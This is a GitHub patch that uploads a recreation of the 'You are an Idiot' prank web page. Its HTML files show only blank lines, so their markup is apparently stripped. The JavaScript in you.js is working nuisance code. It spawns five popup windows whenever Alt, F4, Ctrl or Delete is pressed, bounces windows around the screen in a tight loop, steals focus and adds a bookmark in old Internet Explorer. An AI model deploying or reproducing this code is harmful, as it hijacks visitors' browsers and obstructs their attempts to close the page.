From 89e45e2d312f3d4f38f8f14dc5da545c3d59b462 Mon Sep 17 00:00:00 2001 From: baseinfinite <147203766+baseinfinite@users.noreply.github.com> Date: Fri, 5 Jan 2024 14:02:40 -0800 Subject: [PATCH] Add files via upload asdasaddsasada --- idiot.png | 0 index.html | 30 ++++++++++++++++++++ lol.html | 15 ++++++++++ you.js | 81 ++++++++++++++++++++++++++++++++++++++++++++++++++++++ youare.swf | 0 5 files changed, 126 insertions(+) create mode 100644 idiot.png create mode 100644 index.html create mode 100644 lol.html create mode 100644 you.js create mode 100644 youare.swf diff --git a/idiot.png b/idiot.png new file mode 100644 index 0000000..e69de29 diff --git a/index.html b/index.html new file mode 100644 index 0000000..757d42d --- /dev/null +++ b/index.html @@ -0,0 +1,30 @@ + + + You are an Idiot! (dot cc) + + + + + + + + + + + + + + + + + + + + + + + + + + + diff --git a/lol.html b/lol.html new file mode 100644 index 0000000..0c5690d --- /dev/null +++ b/lol.html @@ -0,0 +1,15 @@ + + + You are an idiot! + + + + + + + + + + + + diff --git a/you.js b/you.js new file mode 100644 index 0000000..33e1b1e --- /dev/null +++ b/you.js @@ -0,0 +1,81 @@ +function bookmark() { + if ((navigator.appName == "Microsoft Internet Explorer") + && (parseInt(navigator.appVersion) >= 4)) + { + var url="lol.html"; + var title="Idiot!"; + window.external.AddFavorite(url,title); + } + } + + var xOff = 5; + var yOff = 5; + var xPos = 400; + var yPos = -100; + var flagRun = 1; + +function changeTitle(title) { + document.title = title; +} + +function openWindow(url) { + aWindow = window.open(url, "_blank", 'menubar=no, status=no, toolbar=no, resizable=no, width=357, height=330, titlebar=no, alwaysRaised=yes'); +} + +function procreate() { + changeTitle("Idiot!"); + for (var i = 0; i < 5; i++) { + openWindow('lol.html'); + } +} + +function altf4key() { if (event.keyCode == 18 || event.keyCode == 115) { alert("You are an idiot!"); procreate(); } } +function ctrlkey() { if (event.keyCode == 17) { alert("You are an idiot!"); procreate(); } } +function delkey() { if (event.keyCode == 46) { alert("You are an idiot!"); procreate(); } } + +function newXlt(){ + xOff = Math.ceil(-6 * Math.random()) * 5 - 10 ; + window.focus() +} + +function newXrt(){ + xOff = Math.ceil(7 * Math.random()) * 5 - 10 ; +} + +function newYup(){ + yOff = Math.ceil(-6 * Math.random()) * 5 - 10 ; +} + +function newYdn(){ + yOff = Math.ceil( 7 * Math.random()) * 5 - 10 ; +} + +function fOff(){ + flagrun = 0; +} + +function playBall() { + xPos += xOff; + yPos += yOff; + + if (xPos > screen.width - 357) { + newXlt(); + } + + if (xPos < 0){ + newXrt(); + } + + if (yPos > screen.height - 330) { + newYup(); + } + + if (yPos < 0){ + newYdn(); + } + + if (flagRun == 1){ + window.moveTo(xPos, yPos); + setTimeout('playBall()', 1); + } +} \ No newline at end of file diff --git a/youare.swf b/youare.swf new file mode 100644 index 0000000..e69de29